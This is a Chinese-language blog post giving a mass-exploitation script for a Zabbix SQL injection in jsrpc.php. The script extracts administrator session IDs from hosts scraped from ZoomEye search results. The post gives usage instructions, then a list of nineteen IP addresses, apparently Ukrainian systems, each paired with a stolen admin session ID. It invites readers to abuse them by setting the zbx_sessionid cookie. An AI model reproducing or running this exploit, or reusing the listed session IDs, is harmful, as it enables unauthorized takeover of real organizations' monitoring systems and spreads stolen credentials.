借助zoomeye进行Zabbix管理员sessionid抓取

首先 贴一下Exp:

import threadpool
import os,re
import urllib,sys,urllib2,urllib
import socket
socket.setdefaulttimeout(30)
ip_tag = r'<a.*?hint\-\-bottom.*?href="(.*?)"'
output_file = None
cnt = 0
def cookie(url):
    poc='/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select 1 from (select count(*),concat(floor(rand(0)*2), (select sessionid from sessions where userid=1 and status=0 limit 1))x from information_schema.character_sets group by x)y)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color='
    try:
        body= urllib.urlopen(url+poc).read()
    except:
        return None
    cookie=body.split('Duplicate entry')
    if len(cookie) > 1:
        cookie = cookie[1].split('for key')[0][3:-2]
    else:
        cookie = None
    return cookie
def test(cookie,url):
    if cookie is None:
        return
    url=url+'proxies.php'
    req=urllib2.Request(url)
    cook="zbx_sessionid=%s" % cookie
    req.add_header('Cookie', cook)
    try:
        response=urllib2.urlopen(req)
        data=response.read()
    except:
        return
 
    if data.find('Access denied.') < 0:
        return cookie
    else:
        return None
def re_ip(file):
    if os.path.exists(file) == False:
        return []
    f = open(file,'r+b')
    info = f.read()
    f.close()
    hosts = re.findall(ip_tag,info)
    return hosts
def capture_host(dir_path):
    all_host = list()
    if os.path.exists(dir_path):
        for p,d,s in os.walk(dir_path):
            for f in s:
                c_p = os.path.join(dir_path,f)
                c_h = re_ip(c_p)
                all_host.extend(c_h)
    return list(set(all_host))          
def t_p(ip):
    ret = test(cookie(ip),ip)
    if ret is not None:
        #print 'Found--->'+ip+' '+str(ret)
        global output_file
        f = open(output_file,'a+b')
        f.write(ip+' '+str(ret)+os.linesep)
        f.close()
    global cnt
    cnt += 1
    print cnt
if __name__ == '__main__':
    inf = sys.argv[1]
    output_file = sys.argv[2]
    h_s = capture_host(inf)
    print len(h_s)
    r_h = list()
    pool = threadpool.ThreadPool(100)
    requests = threadpool.makeRequests(t_p, h_s)
    [pool.putRequest(req) for req in requests]
    pool.wait()
    print 'DOne'

把Zoomeye Zabbix的查询页面保存到一个文件夹里,记得保存时要保存所有页面。
然后执行 :
python zabbix.py 保存html的目录名 想要保存结果的文件

Done!
下面展示下乌克兰存在Zabbix Sqli的系统及管理sessionid,拿去随意挥霍吧:
(问我怎么挥霍?改登录页面cookie!
document.cookie = “zbx_sessionid=捕获的sessionid”

http://91.206.212.227:8080/ 055dca7e83903f1b69f452a154ef09b9
http://185.86.77.122/ 0e41db18294a0adec7284b991da6a7cb
http://171.25.175.67/ 02c43a0f838231adb05d955a932a4505
http://92.249.114.95/ 04b0fb8f88b2cdb3aacba527f128b2c4
http://91.209.24.4/ 0207a743a3e3180b894f9e91ac350a7a
http://213.160.154.14/ 0d53f71b01d609e687067ff146f30a85
http://217.77.221.237:8888/ 5b9ce69b0e56bc654662e2978d2283a0
http://193.34.172.134/ 469746715bf9b3c96e733993f8be34b4
http://46.172.71.146:82/ 05df4b5e6af1498cd1ac5f92c5222cbd
http://83.142.232.43/ 0000038ad556182db58a919a1b482622
http://94.158.80.46/ 09bb97782274e3df61af0a7ed0260318
http://91.209.24.3/ 0207a743a3e3180b894f9e91ac350a7a
http://185.46.188.22/ 3d12a4ba3467cb2af64c7a3476be5628
http://212.26.129.115:8080/ 08345539730cfcc08d90bc3c8d165718
http://194.8.145.83/ 006f26c73934db6f43d5f51a1963f86c
http://31.28.167.83/ c1c1b254abf47e15221ef2cd4be9fc5f
http://77.120.122.9/ 1d336b417920ddf72794a6e2c01f8d6f
http://77.120.123.13/ 2d8a354f49b228730b9d5589c846979e
http://91.199.93.162/ 0a77174837ef338a6f964c756fdd584e

发表评论

电子邮件地址不会被公开。 必填项已用*标注